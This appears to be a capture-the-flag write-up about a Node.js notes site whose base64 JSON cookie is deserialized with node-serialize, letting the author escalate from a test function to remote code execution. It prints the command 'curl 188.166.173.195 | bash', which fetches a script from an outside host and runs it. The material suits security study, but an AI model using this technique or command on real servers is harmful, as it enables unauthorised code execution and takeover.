We created this website for hackers to save thier payloads and notes in a secure way
Quick Analysis
After registration, the endpoint register return notes cookie, which is a base64 eyJub3RlcyI6eyIwIjoiU2FtcGxlIE5vdGUifX0= and redirect to /notes endpoint. The endpoint /notes rendered the registered username and Sample Note.
Analyzing the notes endpoint and cookie
Decode the cookie value of notes eyJub3RlcyI6eyIwIjoiU2FtcGxlIE5vdGUifX0= using Base64 algorithm.
from base64 import b64encode, b64decode
notes_value = 'eyJub3RlcyI6eyIwIjoiU2FtcGxlIE5vdGUifX0='
b64decode(notes_value).decode()
'{"notes":{"0":"Sample Note"}}'
The JSON object contains notes that are parsed and returned in the endpoint /notes.
Change the cookie value of notes then, reload the endpoint /notes.
SyntaxError: Unexpected token O in JSON at position 29
at JSON.parse (<anonymous>)
at exports.unserialize (/data/node_modules/node-serialize/lib/serialize.js:62:16)
at /data/app.js:42:37
at Layer.handle [as handle_request] (/data/node_modules/express/lib/router/layer.js:95:5)
at next (/data/node_modules/express/lib/router/route.js:144:13)
at Route.dispatch (/data/node_modules/express/lib/router/route.js:114:3)
at Layer.handle [as handle_request] (/data/node_modules/express/lib/router/layer.js:95:5)
at /data/node_modules/express/lib/router/index.js:284:15
at Function.process_params (/data/node_modules/express/lib/router/index.js:346:12)
at next (/data/node_modules/express/lib/router/index.js:280:10)
From the exception, the endpoint /notes uses node-serialize to unserialize the object.
Exploitation
Proof of concept
Since the endpoint /notes render the notes object, craft a function that returns 1; if the application is vulnerable, the endpoint /notes should return 1 on the page.
Payload
The function executes the command curl 188.166.173.195 | bash via exec function.
The command curl 188.166.173.195 | bash requests the index.html content from 188.166.173.195 via curl, then curl pipes the content of index.html to bash.
